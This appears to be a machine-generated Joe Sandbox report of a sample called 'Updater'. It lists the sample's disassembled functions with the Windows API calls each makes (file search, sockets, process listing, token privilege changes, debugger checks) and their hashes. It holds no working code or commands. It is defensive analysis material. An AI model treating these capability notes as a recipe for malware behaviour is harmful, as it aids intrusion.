Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 8a47f2a3c3e9a8a988fd4b26f35b58139f8bb07290552d189eab0be1b374a898
Instruction ID: 75b0752aa3ab86375eabe4d593e33c74a979777b8e32eee5a4c54323035d6188
Opcode Fuzzy Hash: 8a47f2a3c3e9a8a988fd4b26f35b58139f8bb07290552d189eab0be1b374a898
Instruction Fuzzy Hash: C5415E71600204EFDB05EF54C889A9A7BF9EF48710F5481ADE905AF225DFB1E941CBA0

Function 00B9A66E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B9A6BB
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B9A6EB
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B9A7B8
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B9A7CE

Strings

*.*, xrefs: 00B9A6A0

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Find$File$CloseFirstNextSleep_wcslen
String ID: *.*
API String ID: 2693929171-438819550
Opcode ID: f12ec9c49dc42d548b356e578088f15ac46a23080dea65cb83af2ad40956c2b0
Instruction ID: 03b768c56c0de3caa5b85f57cb620aac4f5b5bdcf0ddb35ad3b17f26f901dce9
Opcode Fuzzy Hash: f12ec9c49dc42d548b356e578088f15ac46a23080dea65cb83af2ad40956c2b0
Instruction Fuzzy Hash: B641527194021AAFCF14DFA4D94AAEEBBF4EF05310F1441B5E819A3191EB349E84CF91

Function 00BA23E0 Relevance: 7.7, APIs: 5, Instructions: 154networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA3B94: inet_addr.WSOCK32(?), ref: 00BA3BC5
Part of subcall function 00BA3B94: _wcslen.LIBCMT ref: 00BA3BE4
Part of subcall function 00BA3B94: htons.WSOCK32(00000000), ref: 00BA3C2D

socket.WSOCK32(00000002,00000002,00000011), ref: 00BA2437
WSAGetLastError.WSOCK32 ref: 00BA245E
bind.WSOCK32(00000000,?,00000010), ref: 00BA24B5
WSAGetLastError.WSOCK32 ref: 00BA24C0
closesocket.WSOCK32(00000000), ref: 00BA24EF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesockethtonsinet_addrsocket
String ID:
API String ID: 1501050944-0
Opcode ID: 75134b0ad4012818eac82ccd0426cade67183549840558ffe1a475fbf48e7254
Instruction ID: 7d7b2e50f5be408b6df30c05331fd9c2767bfd77b5d0a5337049dba81c3ea11e
Opcode Fuzzy Hash: 75134b0ad4012818eac82ccd0426cade67183549840558ffe1a475fbf48e7254
Instruction Fuzzy Hash: 7751B375A00220AFD710EF24D896F2AB7E4EF49714F1481D8F9099F393DA75AD41CBA1

Function 00B8E2AB Relevance: 7.6, APIs: 5, Instructions: 91processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B8E2D0
Process32FirstW.KERNEL32(00000000,?), ref: 00B8E2DE
Process32NextW.KERNEL32(00000000,?), ref: 00B8E2FE
CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00B8E376
CloseHandle.KERNEL32(00000000), ref: 00B8E3BC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
String ID:
API String ID: 2000298826-0
Opcode ID: 00379d93f818e59ff075e8f0297e2c6fe6d8be98fb3aa4f6468374a99767e65c
Instruction ID: 464655855bc7d9d05744de80c52ea7737ce7ea9528f8e5910117312e09c8c319
Opcode Fuzzy Hash: 00379d93f818e59ff075e8f0297e2c6fe6d8be98fb3aa4f6468374a99767e65c
Instruction Fuzzy Hash: DE31AC711083019FC301EFA4D885AAABBF8EF89340F4409BDF596871A1EBB0DD49CB52

Function 00BB2558 Relevance: 7.6, APIs: 5, Instructions: 79windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00BB25D0
IsWindowEnabled.USER32 ref: 00BB25DE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00BB25EB
IsIconic.USER32 ref: 00BB25F9
IsZoomed.USER32 ref: 00BB2607

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: f8d5e03a1ac11e53489678efd7252ad6c769c7a9e7c0b9dce0efdc73945369e5
Instruction ID: 63189ed74cde4afbad3ea3dd5078f4b333e0ae8f83d7459a7ef85ccdcb2e6d3a
Opcode Fuzzy Hash: f8d5e03a1ac11e53489678efd7252ad6c769c7a9e7c0b9dce0efdc73945369e5
Instruction Fuzzy Hash: 2921D1357002115FE7319F16C854BAB7BE8FF64318F5580A9E40A8B652CBB5ED82CBA0

Function 00B820BE Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B820D4
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B820E0
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B820EF
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B820F6
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B8210C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0644427ac385ce1543f147e748d8eeb8845c3f3d82ff3a2c54bf032bf169e4e8
Instruction ID: 2f738ba88007c26d6caa771bc9f282cbbf91e3b0c12167b13d062aafe3c0a3b8
Opcode Fuzzy Hash: 0644427ac385ce1543f147e748d8eeb8845c3f3d82ff3a2c54bf032bf169e4e8
Instruction Fuzzy Hash: D3F062B5100301ABDB112F64DC4EF563BADEF89760F600524FA45E7261DEB5DC00CB60

Function 00B5B99F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B5B9AF

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

GetTimeZoneInformation.KERNEL32 ref: 00B5B9C1
WideCharToMultiByte.KERNEL32(00000000,?,00BF21DC,000000FF,?,0000003F,?,?), ref: 00B5BA39
WideCharToMultiByte.KERNEL32(00000000,?,00BF2230,000000FF,?,0000003F,?,?,?,00BF21DC,000000FF,?,0000003F,?,?), ref: 00B5BA66

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide$FreeHeapInformationTimeZone_free
String ID:
API String ID: 2063591714-0
Opcode ID: 5c03d5b124871e8949b5a7165efa9def713a315f875aeac40d0d37ac005c82dc
Instruction ID: b7506b215acbfbe7ca1057213d16f7ba0c089bdd8e3a2a9a0119723ceaaaa65f
Opcode Fuzzy Hash: 5c03d5b124871e8949b5a7165efa9def713a315f875aeac40d0d37ac005c82dc
Instruction Fuzzy Hash: CD31CD70904245EFCB11DFA9DC80E79BBF8FF0535171442EAE960AB2A1DB709E49CB60

Function 00B9D935 Relevance: 6.1, APIs: 4, Instructions: 76filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00B9D97A
GetLastError.KERNEL32(?,00000000), ref: 00B9D9DB
SetEvent.KERNEL32(?,?,00000000), ref: 00B9D9EF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: ff28320ce1382798ee82ac109cc729f4af012e854b848517fc8fe52b79b153b5
Instruction ID: a77dc91ae38caae23f3f6562484d115843636b208c02d04347011b9297456b70
Opcode Fuzzy Hash: ff28320ce1382798ee82ac109cc729f4af012e854b848517fc8fe52b79b153b5
Instruction Fuzzy Hash: 8E21AF755003059FEF20EFA6C888BABB7FCEB40314F5045AAE64693551EB74EE44DBA0

Function 00B89168 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 569stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B8917A

Strings

|, xrefs: 00B891AA
(, xrefs: 00B891C0

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 4945aaec5272aa3223c0b518f774be8f931ef2bdea6e5d8d2a8715fe9c54d60d
Instruction ID: e3e7c87828d6fcb382bb6dc5e4c82669e319e0eb93f6bd60bf282f60c5b9bd91
Opcode Fuzzy Hash: 4945aaec5272aa3223c0b518f774be8f931ef2bdea6e5d8d2a8715fe9c54d60d
Instruction Fuzzy Hash: 4B322475A007059FCB28DF59C481AAAB7F0FF48710B15C5AEE59ADB3A1EB70E941CB40

Function 00B9686D Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B96897
FindNextFileW.KERNEL32(00000000,?), ref: 00B968ED
FindClose.KERNEL32(?), ref: 00B96935

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0ae81f9c92dfd7b8339ad718a69259e8326a7718234ff2ae6afa04b9eb126806
Instruction ID: 6de37db2d6210f57f66decd11738b4bc2e1f802a068d8ae64334ab21588c7ca4
Opcode Fuzzy Hash: 0ae81f9c92dfd7b8339ad718a69259e8326a7718234ff2ae6afa04b9eb126806
Instruction Fuzzy Hash: 485188746046029FDB18DF28C490EAAB7E4FF49320F1445ADE56A8B3A2DB34FD05CB91

Function 00B52446 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000004), ref: 00B5253E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000004), ref: 00B52548
UnhandledExceptionFilter.KERNEL32(00B21221,?,?,?,?,?,00000004), ref: 00B52555

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7abde7c9aac18c74778259be9016613fcd918c857499ef50ec183cab86fd9304
Instruction ID: f22a3ade9b80f7a1e8561fd62539243358d57350b7942abc5801597771245dcf
Opcode Fuzzy Hash: 7abde7c9aac18c74778259be9016613fcd918c857499ef50ec183cab86fd9304
Instruction Fuzzy Hash: 3931D574D01218ABCB21DF24D88979DBBF8AF18311F5042EAE81CA7251EB749F858F44

Function 00B827D9 Relevance: 4.6, APIs: 3, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00B4042B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B40C74
Part of subcall function 00B4042B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B40C91

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B82823
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B82850
GetLastError.KERNEL32 ref: 00B82860

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 9f536db98a9ba17b719b3ece36380a2a3cea0b98e0bd2dabf609e18961463158
Instruction ID: ef785e7d54a84bf0dc5960b159b80ccbf4f56ba0863939f905e1965d2748afbb
Opcode Fuzzy Hash: 9f536db98a9ba17b719b3ece36380a2a3cea0b98e0bd2dabf609e18961463158
Instruction Fuzzy Hash: 8411BFB1914204AFEB18AF54EC86D6AB7F8EF08720B20816EF54657251EB70BC41CB64

Function 00B8E3CB Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B8E3E8
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B8E429
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B8E434

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: c5943ede993a46af608a7e48100aed51343a283b7b28c90bd7def303bb813ce9
Instruction ID: 5667cd8bc9ca3c4d326fb26de53f72070c9e6c06e75e12e3363d96c8d9f6fe1f
Opcode Fuzzy Hash: c5943ede993a46af608a7e48100aed51343a283b7b28c90bd7def303bb813ce9
Instruction Fuzzy Hash: D9117075E01228BFDB108F959C44BAFBBBCEB45760F108151F914E7290D6744A008BA1

Function 00B82777 Relevance: 4.5, APIs: 3, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B827A0
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B827B5
FreeSid.ADVAPI32(?), ref: 00B827C5

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d3c658457f2cd6bf5f6d18a9c584d974b7a55bb2b872d904e082eff742538aa7
Instruction ID: 9f71a54c4e5ca934aeac4c00afd6e710a7ea31710b471ae68f5a1e9b827b68b0
Opcode Fuzzy Hash: d3c658457f2cd6bf5f6d18a9c584d974b7a55bb2b872d904e082eff742538aa7
Instruction Fuzzy Hash: 19F01D7595030DBBDB00DFE4DC89AADBBBCFB04205F5045A5E900E3191EB75AA44CB50

Function 00B8E9BA Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B76A2B), ref: 00B8E9CA
FindFirstFileW.KERNEL32(?,?), ref: 00B8E9DB
FindClose.KERNEL32(00000000), ref: 00B8E9EB

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4802e3f3d56ba6ff70086881f4ecfc4a7091b985ce6eff22f83cec24ef5c374e
Instruction ID: c0c5987186a9727f9f16b53dfee77b84c7c0a2a1787076556a0d8b057247f4eb
Opcode Fuzzy Hash: 4802e3f3d56ba6ff70086881f4ecfc4a7091b985ce6eff22f83cec24ef5c374e
Instruction Fuzzy Hash: 55E09A328105126B82107A78EC0D8AA76989A06335F100B55F935C20F0FBF4DD408696

Function 00B44BF4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002,00000000,?,00B52799,00000003), ref: 00B44C15
TerminateProcess.KERNEL32(00000000,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002,00000000,?,00B52799,00000003), ref: 00B44C1C
ExitProcess.KERNEL32 ref: 00B44C2E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 68be89e161e8c225b4bfbaa23eee5d78d1df1c698bd6a7d1220fcea19ec70467
Instruction ID: 395a5eb57be30320adfc9dbb428057b0ecf0bfa42a97965645e631c9c1075ff2
Opcode Fuzzy Hash: 68be89e161e8c225b4bfbaa23eee5d78d1df1c698bd6a7d1220fcea19ec70467
Instruction Fuzzy Hash: 0CE04631001108AFCF126F58DD48B587BE9FB04382B084894F9058B232DFBADE52EB41

Function 00B4C9C0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0b96ee7b06c7627652edda853dbcc41b50f2ddd0d20d250582382ad828a6bc
Instruction ID: ca434b3532810b2d923458e9d35e5beb961180f0e400bd3cb89098f8beeebded
Opcode Fuzzy Hash: 2c0b96ee7b06c7627652edda853dbcc41b50f2ddd0d20d250582382ad828a6bc
Instruction Fuzzy Hash: 69023B71E012199BDF54CFA9C8806ADBBF1EF88714F2582AAD819E7344D731AE41DB90

Function 00B974F0 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B9751A
FindClose.KERNEL32(00000000), ref: 00B97563

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 06d6d8b8a7a1dd4df6b0fe6d29e66509da617ab62d1c6189c5d89fcad742198f
Instruction ID: 617630d58bc49e8574c9ce55f91cc29998ad5aa6f16727f9143ad6ebb2d01e1b
Opcode Fuzzy Hash: 06d6d8b8a7a1dd4df6b0fe6d29e66509da617ab62d1c6189c5d89fcad742198f
